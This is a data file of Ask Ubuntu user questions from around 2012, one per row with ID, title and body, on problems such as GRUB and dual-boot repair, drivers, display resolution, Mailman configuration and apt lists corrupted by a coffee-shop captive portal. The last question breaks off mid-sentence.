180712	how to enable laptop-mode ?	laptop-mode is said to be one of the energy efficiency boosters for linux . now , sources i found say that to activate you need to : install laptop-mode-tools append laptop_mode_enabled=true ( if it does n't exist ; otherwise make sure that it 's set to true ) inside /etc/default/acpi-support however , even after doing this laptop mode is not running ( i have it set up in /etc/laptop-mode/laptop-mode.conf to be always on ) : ~ $ cat /proc/sys/vm/laptop_mode 0 does anyone know how can i enable laptop-mode ? it is mentioned here that the ubuntu package is `` crippled '' . is it really the case that ubuntu does n't allow you to enter this mode on ac ? if so , why ? edit - it seems that laptop-mode is not necessary any more since ubuntu 12.04 , according to this question .
180717	how can i delete my older versions of ubuntu ?	i 'm running from a low disk space two ubuntu versions . i 've installed ubuntu 12.04 in a 6 gb disk partition , but after i updated it , the boot manager shows an older version of ubuntu in the o.s . menu . i want to delete this old version so that i can free up disk space , as only 1 gb is left now .
180726	java does n't work	i was writing a program on my laptop to run on my server in java . however , my laptop has java 7 running , my server java 6 . this messed up . i tried to upgrade my server by installing openjdk-7-jre and openjdk-7-jdk packages . this did n't work . so i followed a guide helping me removing all java associated files and then re-install the needed packages . something went wrong here . i installed all the available java 7 packages and now i can not use the java command anymore . i probably screwed up , does anyone knows how to fix it ? i tested it with both the 7 and 6 install , nothing works anymore .
180727	newly installed kernel version missing from grub menu	i have a problem with dual-booting windows 7 and ubuntu on my computer . when i chose ubuntu , another option appears that lets me choose a kernel version . however , the kernel i just installed is not on this list . version in the list : 3.5.2 updated installed version : 3.5.3
180728	xubuntu 12.04 grub recovery after separate windows 7 install	i have a raid drive : /dev/mapper/isw_bjeeefeied_lightspeed with root linux partition at : /dev/mapper/isw_bjeeefeied_lightspeed7 . i 've installed windows 7 on the separate partition so it rewritten the boot loader . now i 'm trying to reinstall grub2 to the mbr using xubuntu 's livecd . i 'm doing : sudo mount /dev/mapper/isw_bjeeefeied_lightspeed7 /mnt sudo grub-install -- recheck -- root-directory=/mnt /dev/mapper/isw_bjeeefeied_lightspeed /usr/sbin/grub-probe : error : can not find a grub drive for /dev/mapper/isw_bjeeefeied_lightspeed7 . check your device.map . auto-detection of a filesystem of /dev/mapper/isw_bjeeefeied_lightspeed7 failed . try with -- recheck . if the problem persists please report this together with the output of `` /usr/sbin/grub-probe -- device-map= '' /mnt/boot/grub/device.map '' -- target=fs -v /mnt/boot/grub '' to < bug-grub @ gnu.org > here 's the output of requested command : /usr/sbin/grub-probe -- device-map= '' /mnt/boot/grub/device.map '' -- target=fs -v /mnt/boot/grub /usr/sbin/grub-probe : info : can not open `/mnt/boot/grub/device.map ' . /usr/sbin/grub-probe : info : changing current directory to /dev/mapper . deps dm_task creation failed deps dm_task creation failed deps dm_task creation failed /usr/sbin/grub-probe : info : no mapping exists for `/dev/mapper/isw_bjeeefeied_lightspeed7 ' . /usr/sbin/grub-probe : error : can not find a grub drive for /dev/mapper/isw_bjeeefeied_lightspeed7 . check your device.map . `` /boot '' is not a separate filesystem in my case . how can i properly reinstall grub2 to the mbr so i can boot my xubuntu desktop as well as windows 7 ?
180730	how do i restore a swap partition i accidentally deleted ?	i accidentally deleted my swap partition via gparted . ( i 'm still logged in the system so restoring should be easier ) can someone help me please ? i 'm not sure how to configure it because the ubuntu installation did it automatically . there are 3 partitions right now : /dev/sda1 - > ubuntu installation root , mounted at '/' /dev/sda2 - > windows partition /dev/sda3 - > fedora partition and /dev/sda4 if im not mistaken was the swap partition ( 4gb size )
180731	wireless network driver installation	i have bought a dell inspiron n5520 laptop . but after installing 12.04 or any other versions ( e.g . 10.04 , 11.04 , 11.10 ) , i can not find any wireless network . even the wireless network settings are not available . i think this is due to some driver problems . i connected my pc to ethernet lan and tried to download the drivers through addition driver installation software , but it shows only the display and graphics drivers . what to do now ? please help . i am a college guy and need ubuntu for programming . i am going to connect it again to lan .
180732	remove ubuntu from live usb	i want to use ubuntu on my usb stick as shown here . but was wandering if i can change my usb stick back when i have finished trying ubuntu ? and if i can , how ?
180733	how to setup an access point mode wi-fi hotspot ?	how to setup an access point mode wi-fi hotspot ? point to be noted : wireless hotspots are n't same as ad hoc networks . significant difference is there . in short , ad hoc networks aren't supported in most android , windows phone and blackberry devices ( and may be ios devices too ) whereas ap mode wi-fi hotspots are . to get an idea about ap mode hotspots , ad hoc networks and their difference , refer this and this .
180738	merge luks-partition with partition on another hdd	i just bought a 2 tb hard disk because the home partition on the old one is almost full . what i want to do is to extend the home partition on hard disk 1 ( sda2 ) to also include all the space on the new hard disk ( sdb1 ) . this seemed rather straight forward at first , however there 's one issue . my home-partition is luks-encrypted . how do i extend sda2 to also span over sdb1 and act as one single partition ? my initial thought was to create a logical volume ( merging sda2 and sdb1 ) , however i was n't able to find a guide with a scenario like my own . any ideas ? fdisk -l output : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0c000236 device boot start end blocks id system /dev/sda1 * 2048 204802047 102400000 7 hpfs/ntfs/exfat /dev/sda2 204802048 1953525167 874361560 83 linux disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x12e102fd device boot start end blocks id system /dev/sdb1 2048 3907029167 1953513560 83 linux disk /dev/mapper/sda2_crypt : 895.3 gb , 895345184768 bytes 255 heads , 63 sectors/track , 108852 cylinders , total 1748721064 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/sda2_crypt does n't contain a valid partition table
180744	how to enable hard-blocked bluetooth in thinkpad edge 320	i 'm trying to use the built-in bluetooth device of my lenovo thinkpad e320 . it seems to be hard blocked , but i ca n't find any possibility to unblock it . rfkill list returns : 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : yes cat /proc/acpi/ibm/bluetooth returns : status : disabled commands : enable , disable i tried to enable it by : pressing fn+f9 ( radio controll ) echo enable | tee /proc/acpi/ibm/bluetooth rfkill unblock bluetooth trough the bios . but it 's not mentioned at all none of the actions influenced the ouputs above .
180748	is there a juju charm for openvpn ?	this is my first time trying to use juju to install a service , and i have not yet found a charm to install openvpn-server easily ( with sensible configuration ) . is any such charm available , and how can i use it ?
180750	windows workgroup issue	how to configure my ubuntu workstation to be a member of windows 7 workgroup ? and how to manage permissions for windows users accessing my ubuntu machine
180751	restoring monitors.xml file	i was following @ alex 's answer about my other question . my gpu is geforce gt 540m . i installed bumblebee and bumblebee-nvidia packages . and reboot , i get this error : none of the selected modes were compatible with the possible modes : trying modes for crtc 310 crtc 310 : trying mode 640x480 @ 73hz with output at 1920x1080 @ 51hz ( pass 0 ) crtc 310 : trying mode 640x480 @ 73hz with output at 1920x1080 @ 51hz ( pass 1 ) and resolution reduced to 640*480 px . after that i uninstall bumblebee , sudo apt-get remove bumblebee bumblebee-nvidia and then , i followed this instructions for this error . they said , delete your monitors.xml file . and i delete it . but it 's not restored . there are only 1024x768 and 640x480 . my original resolution was 1920x1080 . i tried unity -- reset after this , i get compiz closed unexpected error . tried to install latest nvidia drivers : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current still there is n't 1920x1080 on displays screen . i want to restore my monitors.xml file and solve my problem . update i just reinstall my compiz . now i do n't get compiz error when unity -- reset
180752	fedora login gone after ubuntu updates on a dual boot	after a software update for ubuntu , my dual boot with fedora will not show fedora in the start menu . it just boots into ubuntu and when i hold shift and boot , it only has ubuntu in the list . i have tried the post about installing grub-customizer but when i run that , i get reading package lists ... done building dependency tree reading state information ... done e : unable to locate package grub-customizer i can not find any other way to fix this problem . i am a complete newbie to linux .
180753	how to get into terminal on my dell laptop which interferes with wi-fi button ?	i use 10.04 regularly and i dual-booted my laptop with 10.04 and windows 7 already . i made a mistake in deleting my entire top and bottom panel on 10.04 . so i am trying to get it back . when i search through forums , it asks me to go to terminal and use some commands to get it back . but the problem is , i am not able to access my terminal through alt+f2 . when i press f2 , my wi-fi goes off because it is the wi-fi button on my dell laptop and my internet is off . it does n't bring me a terminal . how should i get to a terminal to do any further action ? @ obsessive foss thank you..that helped ctrl+alt+t . i just pressed some commands to get back my ubuntu top panel . i used the commands gconftool-2 -- shutdown rm -rf ~/.gconf/apps/panel pkill gnome-panel but the cursory look at commands suggests i am shutting down gconftool and then killing process gnome panel too . how am i able to get back my top panel then..what are these commands actually doing ? ?
180754	nvidia vs. 12.04 unity > recovery	i had successfully installed nvidia-linux-x86_64-302.07.run from the nvidia website . that got me nothing but an unalterable 640x480 screen . purge and autoremove did n't seem to undo it . i attempted , via ubuntu software center , to reinstall nvidia-common ( 295.40-0ubuntu1.1 ) , but that does n't get me anywhere either . unity -- reset does n't help ( compiz errs ) . is there anything , short of wipe/reinstall of 12.04 , that i could try ?
180756	syncing purchased music to my mobile phone	i 'm struggling to sync some of the music tracks that i purchased via the rhythmbox onto my mobile phone . whenever i select `` download '' via the ubuntu one app , the download keeps failing . this happens for some music but not others . the music appears in rhythmbox on my pc , so is there another way to to transfer my purchased music to my phone ? i 'm finding it very confusing and i 'm not sure what to do . i use ubuntu 12.4 on my pc and my phone is samsung galaxy s2 . also is there a user guide for absolute beginners anywhere ? thanks for help/advice .
180757	ubuntu screen freezes in acer	my acer aspire 's usb ports fried in the middle of a system recovery . so i pulled my internal hdd and placed it in an external hdd casing and installed ubuntu on it as a bootable external hdd using a dell inspiron 15 inch . now i want to use this external hdd as the internal hdd on my acer but this hdd works fine on the dell ( as external hdd ) but freezes at boot-up on the acer aspire ( as internal hdd ) . since the usb ports are fried and it has no optical drive i have no way to boot the acer except this hdd . i think its a problem with screen resolution but i shall be grateful for any possible answers .
180758	create own screen resolution without nvidia	i had a problem with my monitor dell e207wfp . the first time i connected it to my ubuntu , it had a possibility to set 1600x1040 resolution , but then i reinstalled some drivers and use set default settings option in monitor , now it has only a 1024x768 available resolution . i read a tutorial on how to make this with nvidia driver , but nvidia made me lots of another troubles and i do n't want it on my ubuntu .
180759	how to backup the xbmc database ( actor information , cover art ... )	i am going to upgrade/fresh install my system from ubuntu 32 bit pae to 64 bit . apart from many things i want to backup , there is one thing i really need to make sure that is correctly backed up . this is the xbmc cache . my connection is slow and i do not want to spend 3 days again downloading all the information . what do i need to backup in order to have this working again . note the following : the source of the movies will be in the same place . i will not change them . right now they are in /media/movies for movies and /media/series for tv series . they will still be like that once i update to 64 bit . the .xbmc in my home folder is the only thing i think i need to backup but i want to be 100 % sure . what else do i need to backup ?
180761	can i use virtualbox with a 64 bit image in a 32 bit host	i have virtualbox 4.1.20 in ubuntu 12.04 32 bit ( with pae ) and i want to run ubuntu server 64 bit on the guest . is this possible ? . i ask since i get the following warning : i want to make sure that there is no option to `` emulate '' this . i have a 64 bit cpu that supports virtualization . the intel dz68db motherboard with an intel i7 2600 cpu .
180765	gtk recent chooser menu callback not working	i am currently very puzzled why something so simple fails so hard : this is the source code for a very very simple recent chooser menu , but it fails . my output is this : display name : recentchoosermenu.c file uri : file : ///home/wolf/downloads/recentchoosermenu.c last application : gedit display name : recentchoosermenu.c ... for every entry , it 's always the first file . i really have no idea why . thanks for any help , wolf edit : well this is embarassing , forgot to append the link : https : //gist.github.com/3483363 sorry .
180771	i ca n't use update manager , access ubuntu related sites or launchpad	i turned on my computer today and when i tried to run updates through update manager , it would just sit there slowly loading a repository forever . then i tried to access ubuntuforums.org and it would n't load . then i tried one.ubuntu.com , launchpad.net , and none of them will load . everything was working fine yesterday , but now the only sites i can access seem to be anything non ubuntu related ( google , yahoo , twitter , imdb , they all work ) . this is one of the strangest things i 've encountered and i ca n't figure it out .
180773	how to make grub display after installing ubuntu on a laptop with windows os ?	i just installed ubuntu 12.04.1 on a laptop , but whenever i turn on my computer , it still boots to windows and grub does n't seem to be working at all . my partition scheme is as follows : /dev/sda1 - some ntfs partition for lenovo recovery or something labeled system_drv ( this has the windows boot flag on it ) /dev/sda2 - my ntfs windows partition /dev/sda3 - my extended partition containing : /dev/sda5 - / partition , ext4 , 20 gb /dev/sda6 - swap partition , linux-swap , 3 gb /dev/sda7 - /home , ext4 , 450 gb /dev/sda4 - another partition that is useful for lenovo recovery or something labeled lenovo_part . the point is , i installed ubuntu 12.04.1 according to this scheme via the liveusb environment , but whenever i turn on my computer , the motherboard bios screen is shown , and then it jumps right to windows and grub is skipped completely . what can i do to fix this ?
180774	how can i make a bootable usb ubuntu live disk for a mac using ubuntu ?	i 've found guides that explain how to make a bootable disk for macs using macs , but i want to use ubuntu to make this mac-bootable disk . is there a way to do that ? in other words , i have : a laptop that runs only ubuntu a 4gb usb thumb drive a mac mini 5,1 with non-working osx lion and i 'd like to install ubuntu on the mac mini . i tried following the instructions here : http : //studyblast.wordpress.com/2011/08/14/guide-mac-os-x-lion-how-to-boot-a-linux-live-system-from-a-usb-drive-how-to-update-any-ocz-ssds-firmware/ but the mediafire download that this guide requires is no longer available , and i ca n't find it anywhere else . so that 's out .
180775	how to clone my lucid ( 10.04 ) + root as an image for further re-installation ?	how to clone my os + it 's root as an image ( without size limitation ) and then for example writing it on a dual layered dvd ? i used remastersys but it issues the size of the output image and then aborts . i 'm trying to make an unlimited image with capability of re-installation using normal boot . i tried clonezilla a little bit , but i 'm not sure it really helps . the problem is that i want unlimited size and i think ( iso ) is defined to not exceed 4.7gb . i really am confused and desperate . if you know a solution please share .
180779	kubuntu 12.04 looks very bad on ibm t23	i 'm using a linux os for the first time ( kubuntu 12.04 ) and i 'm absolutely amazed of it . i learned a lot in the past few days , and everything works great on my old machine but the looks of the os is absolutely unacceptable . i could n't figure it out by my self so i decided to ask for help in this forum . but see it yourself : would like it to just look clean and simple . i really hope , that someone can help me here , because besides this , everything works just fine on my beloved t23 . i also do n't need no glowing buttons and things like this , but first things first .
180780	print to pdf from firefox and chromium text is image not selectable	i have recently upgraded from 10.04 lts to 12.04 lts ( fully up-to-date ) . complete fresh format and install of the linux partition . i noticed that pdf files printed from firefox 14.0.1 and chromium 18.0.1025.168 ( developer build 134367 linux ) sometimes do not contain selectable text . however , initially , i did n't realize it was in some way dependent upon the web page being printed . after some time , i discovered that printing only some web pages result in un-selectable text [ text is image only ] , in both firefox and chromium . for example . however , printing some pages result in selectable text , for example . so far as i can tell , the problem seems to affect both firefox and chromium equally , although i have only tested on several web pages , including the bbc . so far , i have not found a page which affected one browser and not the other . initially i thought it might be a damaged cups-pdf ( because this had always worked before in previous ubuntu versions ) , but i removed and reinstalled that . i also removed and reinstalled firefox . i believe it does n't appear to be postscript , although i do n't really understand the details of how pages are constructed for printing â ( i removed and reinstalled gv ) . restarts made no difference . i found that printing to pdf from libreoffice is n't apparently affected . so , i 'm beginning to suspect that it 's most probably in linux , or in both browsers â but that seems rather less likely , but it could be something else that affects both browsers . i have to say that i 'm stumped . please help !
180783	how to restore plymouth to its original state ?	when i first installed 12.04 plymouth would sometimes show a few commands beneath the ubuntu logo . i later learned that it conflicts with proprietary drivers.i tried to fix this using the plymouth manager but that only made it worse . then i followed the instructions in this post `` http : //www.omgubuntu.co.uk/2011/05/how-to-fix-the-plymouth-boot-screen-when-using-proprietary-graphics-drivers/ '' and now plymouth does n't show up at all . all i see is commands flushing down a terminal then ubuntu loads . is there a way i could get plymouth back to its original state ? like a purge and reinstall without damaging my system or getting things too complicated .
180784	can not connect to a wireless network	this is my first time using ubuntu . i just cleared my hard drive and installed desktop 12.04 . i 'm trying to connect to my home wireless network but it 's not letting me . i 've triple checked the wep code . also , i can connect using a wired connection . please help !
180786	what causes blurry fonts in qt applications ( in xfce desktop ) ?	i am using xubuntu 12.04 with xfce 4.8 fonts in qt-based apps like vlc look blurry in my user profile , as if anti-aliasing was turned off . chrome has the same problem . the problem is not system-wide though : in another user profile on the same machine , i have tried a couple of qt applications and they look fine there .
180792	intermittent 100 % cpu running e.g . firefox or libre office writer on 12.04 unity	occasionally some applications lock and their windows goes dark or changes colour . this has happened most frequently when running firefox but happened today when running libre office writer and pasting an image . the system monitor shows 100 % cpu on these occasions but i am able to kill the appropriate process . this is most frustrating and does not give me confidence in using unity especially as i have never had a similar problem running 10.04 gnome . please let me know what detail/log is needed so to provide information so that the problem may be diagnosed/fixed .
180793	how can i set a global timeout for the screensaver ?	i am trying to to set a global screensaver and blanking idle timout ( with screen locking ) that will affect all new user accounts . i noticed that gnome-screensaver in 12.04 when configured by a user , writes some data to a blob in ~/.dconf , but i have no idea how to set it globally . i also know that the global timeout is 10 minutes with blanking , but have no idea where this is set system wide . i find the whole dconf transition a bit difficult . if it is not possible to configure gnome-screensaver this way , i would be quite interested in a solution with xscreensaver/xlock . the purpose of this is to set a blank screen with automatic locking . both because of resource usage and security . forgot to mention that this is a default ubuntu 12.04 desktop install with unity and lightdm . i will however install gnome-shell and gnome-session-fallback to let people choose . it would be nice if a solution works across different sessions .
180801	illegal list name : mailman configuration with fqdn	what do i need to so that mailman , and also dovecot-postfix , use the fqdn of dur.bounceme.net ? or , at least , so that mailman is usable on localhost . root @ dur : ~ # root @ dur : ~ # newlist mailman enter the email of the person running the list : hawat.thufir @ gmail.com initial mailman password : create a new , unpopulated mailing list . usage : /usr/sbin/newlist [ options ] [ listname [ listadmin-addr [ admin-password ] ] ] options : -l language -- language=language make the list 's preferred language `language ' , which must be a two letter language code . -u urlhost -- urlhost=urlhost gives the list 's web interface host name . -e emailhost -- emailhost=emailhost gives the list 's email domain name . -q/ -- quiet normally the administrator is notified by email ( after a prompt ) that their list has been created . this option suppresses the prompt and notification . -h/ -- help print this help text and exit . you can specify as many of the arguments as you want on the command line : you will be prompted for the missing ones . every mailman list has two parameters which define the default host name for outgoing email , and the default url for all web interfaces . when you configured mailman , certain defaults were calculated , but if you are running multiple virtual mailman sites , then the defaults may not be appropriate for the list you are creating . you also specify the domain to create your new list in by typing the command like so : newlist -- urlhost=www.mydom.ain mylist where `www.mydom.ain ' should be the base hostname for the url to this virtual hosts 's lists . e.g . with this setting people will view the general list overviews at http : //www.mydom.ain/mailman/listinfo . also , www.mydom.ain should be a key in the virtual_hosts mapping in mm_cfg.py/defaults.py if the email hostname to be automatically determined . if you want the email hostname to be different from the one looked up by the virtual_hosts or if urlhost is not registered in virtual_hosts , you can specify `emailhost ' like so : newlist -- urlhost=www.mydom.ain -- emailhost=mydom.ain mylist where `mydom.ain ' is the mail domain name . if you do n't specify emailhost but urlhost is not in the virtual host list , then mm_cfg.default_email_host will be used for the email interface . for backward compatibility , you can also specify the domain to create your new list in by spelling the listname like so : mylist @ www.mydom.ain where www.mydom.ain is used for `urlhost ' but it will also be used for `emailhost ' if it is not found in the virtual host table . note that ' -- urlhost ' and ' -- emailhost ' have precedence to this notation . if you spell the list name as just `mylist ' , then the email hostname will be taken from default_email_host and the url will be taken from default_url ( as defined in your defaults.py file or overridden by settings in mm_cfg.py ) . note that listnames are forced to lowercase . the list admin address need to be a fully-qualified address , like owner @ example.com , not just owner . illegal list name : mailman @ dur root @ dur : ~ # root @ dur : ~ # cat /etc/hostname dur.bounceme.net root @ dur : ~ #
180815	is ubuntu.com blocking my ip address ?	my ability to update stopped recently , with all calls to *ubuntu.com and ubuntuforums.com failing completely . things just time out , but other sites work just fine . it 's happening upstream of my router ; traceroute from my router fails to connect . it 's not on my computer either ; when connected on wifi , my android phone fails to connect also , but when i get off wifi my phone gets to ubuntu.com without problems . i can visit ubuntu.com in a browser only if i go through an anonymous proxy . the problem is n't dns , either , as it resolves an ip address , but i tried a few different dns servers just in case . i 've tried updating my repositories in package manager , but they all also fail . what happened ? is it possibly my isp blocking all traffic to ubuntu.com and the mirror domains ? is ubuntu mad at my ip address or range ? i am running linux mint 13 , kernel 3.2.0-26-generic-pae .
180818	running command from teamcity fails , but running it in the terminal it succeeds	i am attempting to build an asp.net mvc 4 project . from the terminal it succeeds . i am logged in as my admin account . teamcity was installed with its ' default settings . from the command prompt : xbuild /var/teamcity/buildagent/work/8873763565ce1ac8/source/momntz.ui/momntz.ui.csproj /t : rebuild /p : config=debug/var/teamcity/buildagent/work/8873763565ce1ac8/source/momntz.ui/momntz.ui.csproj /t : rebuild /p : config=debug from teamcity : /opt/mono-2.11/bin/xbuild /var/teamcity/buildagent/work/8873763565ce1ac8/source/momntz.ui/momntz.ui.csproj /t : rebuild /p : config=debug error : /opt/mono-2.11/bin/dmcs : 2 : /opt/mono-2.11/bin/dmcs : mcs : not found /opt/mono-2.11/lib/mono/4.0/microsoft.csharp.targets : error : compiler crashed with code : 127 . task `` csc '' execution -- failed it feels like a permissions issue , but i 'm new to ubuntu and i do n't know how to go about tracking the issue down .
180819	how to control brightness on acer laptop	i 've installed ubuntu 12.04 in an acer timeline x 5830tg and brightness controls were not working ( fn + key ) , even the ubuntu 's one .
180823	12.04 precise hdmi not working on ati radeon	this is precisely a 12.04 hdmi output problem , because it works for 11.10 - everything else are the same , only the os version is different . the symptom is that on my hdmi output tv screen , it always shows unsupported resolution even after setting it to the resolution that works on ubuntu 11.10 ( via gnome-control-center , in which it detects my tv just fine ) , i still do n't see any output on tv . the audio is not working either . i think it is 12.04 's problem , because if i boot into ubuntu 11.10 , and everything else remain the same , hdmi output ( video & audio ) work just fine . 12.04 is a freshly installed , just the vanilla ubuntu hd installation . how should i nailed down / fix the problem ?
180824	when i move a photo to /usr/share/backgrounds/ with terminal it becomes unreadable non root user	i want my desktop background to also be the background for the greeter so i type this into terminal sudo cp /home/luke/pictures/wallpapers/starfish.jpg /usr/share/backgrounds/ the copy works fine , however when i go to backgrounds the thumbnail is a question mark and the photo can not be opened nor set as the background . to troubleshoot i typed in gksudo nautilus /usr/share/backgrounds/ and voilă , the photo has the correct thumbnail , and is able to be opened with a double click . how do i get this problem to go away ? i copied the exact same wallpaper to the exact same directory on my laptop and set it as my wallpaper ( and greeter background ) with no problems . why wo n't it work on my desktop ?
180827	startx and system-wide default gnome session	i get into x by startx ( not lightdm ) . how can i define the default gnome session ( gnome-classic instead of 2d/3d ) system-wide for all users ?
180835	different wallpapers on monitors in twinview with wallch	is there any way to set wallch to rotate through different wallpapers on different monitors , using twinview ? i 'm assuming the same trick for workspaces does n't work for monitors . thanks
180837	apt lists in /var/lib/apt/lists overwritten with html page for starbucks wifi terms	i sat down at starbucks this afternoon to do some work ( ubuntu 12.04 desktop x64 ) , and got the red-circle-with-white-line error icon in the systray notifying of a package error . also , apt , aptitude , update-manager , and synaptic were all failing to even start up because of this . took a closer look , and the error was : > sudo aptitude install mmv [ sudo ] password for kurtosis : [ err ] reading package lists e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/linux.dropbox.com_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . [ err ] reading package lists e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/linux.dropbox.com_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . so opened up the culprit , /var/lib/apt/lists/linux.dropbox.com_ubuntu_dists_precise_main_binary-i386_packages , and lo and behold , the entire file has been overwritten by the html source for starbuck 's att wifi terms and conditions page , that you have to agree to by checking the checkbox the first time you log onto their free wifi ( first few lines below ) . this is extremely bizarre and bit disconcerting , since some random internet site has managed to overwrite a file that should only be modifiable by root . any idea what happened ? solved by deleting /var/lib/apt/lists and regenerating with this command : $ sudo -i # apt-get clean # cd /var/lib/apt # mv lists lists.old # mkdir -p lists/partial # apt-get clean # apt-get update starbucks att wifi homepage source : < ! doctype html public `` -//w3c//dtd xhtml 1.0 transitional//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd '' > < html xmlns= '' http : //www.w3.org/1999/xhtml '' lang= '' en '' xml : lang= '' en '' > < head > < title > at & t wi-fi service @ starbucks < /title > < meta http-equiv= '' content-type '' content= '' text/html ; charset=utf-8 '' / > < link rel= '' shortcut icon '' type= '' image/ico '' href= '' /favicon.ico '' / > < script type= '' text/javascript '' language= '' javascript '' src= '' /dhtml/master.js '' > < /script > < script type= '' text/javascript '' language= '' javascript '' src= '' /dhtml/x_core.js '' > < /script > < script type= '' text/javascript '' language= '' javascript '' src= '' /dhtml/x_event.js '' > < /script > < script type= '' text/javascript '' language= '' javascript '' src= '' /dhtml/x_xhr.js '' > < /script > < script type= '' text/javascript '' src= '' /dhtml/aws/dhtml.js '' > < /script > < script type= '' text/javascript '' src= '' /dhtml/jquery/jquery-1.3.2.js '' > < /script > < script type= '' text/javascript '' language= '' javascript '' src= '' /dhtml/jquery/aws_jclock_2.2.0.js '' > < /script > < script type= '' text/javascript '' language= '' javascript '' > $ ( function ( $ ) { var options = { format : ' % i : % m < span class= '' clock_ampm '' > % p < /span > ' } $ ( '.jclock ' ) .jclock ( options ) ; } ) ; < /script > < link rel= '' stylesheet '' type= '' text/css '' href= '' /css/att/themes/sbux/laptop_free_v3.css '' / > < link rel= '' stylesheet '' type= '' text/css '' href= '' /css/att/themes/sbux/sbux_auto_addl_v2.css '' / > < /head > < body > < div id= '' free_wrap '' > < div id= '' topblock '' > < div id= '' topmid '' > < div id= '' free_sbux_mainform '' > < div id= '' iframe_free '' > < iframe id= '' sbux_iframe '' src= '' http : //www.starbucks.com/coffeehouse/wi-fi-landing '' scrolling= '' no '' > < /iframe > < /div id= '' iframe_free '' > < div id= '' free_sbux_logo '' > < a href= '' http : //www.starbucks.com '' > < /a > < /div id= '' free_sbux_logo '' > < div id= '' free_sbux_location '' > < div id= '' location_city '' > palo alto , ca < /div id= '' id= '' location_city '' > < /div id= '' free_sbux_location '' > < div id= '' inline_free_form '' > < div id= '' free_text_line '' > starbucks is pleased to offer complimentary wi-fi < b > including the premium content of the starbucks digital network < /b > to customers who are enjoying our food and beverages. < /div > ...
180839	installed windows 7 alongside ubuntu ; no longer boots	i installed ubuntu 12.04 alongside windows about a week ago and i can no longer boot in to windows . when i attempt to boot , i get the error , `` invalid efi file path . '' i tried to change the boot parameters for the entry in grub from /dev/sdc1 to /dev/sda* ( the asterisk representing 1-3 ) to see if that 's the issue since there 's actually no windows install except for on /dev/sda , but that did n't exactly work . here is the paste from boot repair : http : //paste.ubuntu.com/1169189/ i understand that repairing the windows boot loader would disallow me from booting in to ubuntu , but i need to get in to windows to do some things , so is that worth a shot ?
180841	how to change gui on dvd ?	i downloaded edubuntu 12.04 lts dvd and when i boot from it , all i get is a white screen , after selecting to install or run from dvd . i 'm almost sure it is a graphic card problem since i 'm using nvdia geforce 6100 nforce 405/pci/sse2 . i tried to update but it 'll take too long and i do n't have the time . my pc is amd athlon ( tm ) 64 x2 dual core processor 4200+ ă 2 with 8gb ram and edubuntu 11.10 os .
180842	how to make shortcuts to executables	i 'm a little bit noob . i can run a program in terminal with ; $ sudo /opt/eclipse/eclipse but i do n't know how to create a shortcut that starts it with root privileges ( they are installed in /opt so it needs root )
180843	vlc media player , conneting to iptv	background : i am trying to connect to my school 's iptv system . i can connect by using vlc player on a windows machine . currently i am trying to connect to iptv with vlc on an ubuntu machine . i keep getting this error . your input ca n't be opened : vlc is unable to open the mrl ' http : //iptv.byu.edu/player/downloadplaylist.htm ' . check the log for details . worked just fine on the windows machine , same 'mrl ' . any tips ? direct me to where i can get better help ? thanks .
180846	run python script in terminal after lubuntu login ?	i 've spent the night trying to figure out how to run a python script in a terminal at startup . adding it to init.d will run the script , but i do n't see a terminal window or any other indication the script is running other than the audio output the python script produces . i would like to be able to see and interact with this script in a terminal just as if i 'd ran it from a terminal . my next successful step was to make a .desktop file in ~/.config/autostart . my exec is exec=lxterminal -e `` python ~/scripts/myscript.py '' when i log in , i see a terminal window flash for just a brief moment - but then disappear . no sound is produced from the python script so i assume it quit running . how do i start a terminal window at system startup and run a python script in it ?
180856	airplane mode after rebooot	after a reboot , my computer defaults to `` airplane mode '' . i have ubuntu 12.04 and was wondering if others were experiencing this and if there was a fix . i have a hp g60 .
180858	please help me install firestorm ?	i have been trying for hours just to install one program . in this time , i 've tried my best to follow directions and not screw everything up but i have . i 'm new to linux . i tried to install firestorm and this is what happened : parent @ ubuntu : ~ $ sudo '/home/parent/downloads/phoenix_firestorm-release_i686_4.2.1.29803/install.sh ' [ sudo ] password for parent : enter the desired installation directory [ /opt/firestorm-install ] : /home/parent/downloads - installing to /home/parent/downloads /home/parent/downloads/phoenix_firestorm-release_i686_4.2.1.29803/install.sh : line 80 : /home/parent/downloads/etc/refresh_desktop_app_entry.sh : permission denied parent @ ubuntu : ~ $ sudo opt/firestorm-install sudo : opt/firestorm-install : command not found parent @ ubuntu : ~ $ ./etc/refresh_desktop_app_entry.sh bash : ./etc/refresh_desktop_app_entry.sh : no such file or directory parent @ ubuntu : ~ $ sudo '/home/parent/downloads/phoenix_firestorm-release_i686_4.2.1.29803/install.sh ' enter the desired installation directory [ /opt/firestorm-install ] : /home/parent - backing up previous installation to /home/parent.backup-2012-08-27 - installing to /home/parent cp : can not stat `/home/parent/downloads/phoenix_firestorm-release_i686_4.2.1.29803/* ' : no such file or directory failed parent @ ubuntu : ~ $ now whenever i go into my files it says it ca n't find anything . like can not find home/parent/downloads . now , i know there are downloads . i do n't know why it 's doing this all of a sudden . i 'm so frustrated that i 'm ready to just go back to windows . i 've already had to uninstall/reinstall ubuntu once today . it 's looking like i '' m going to have to do it again . how can i fix my file problem that i 'm now having and can someone please , please tell me how to install firestorm ? i mean they do n't even have their repository listed . it 's ridiculous to have to go through this over a program . spotify was n't hard at all to install so why is this ? someone please help , and i 'm sorry if i sound like a total idiot . i 'm pretty 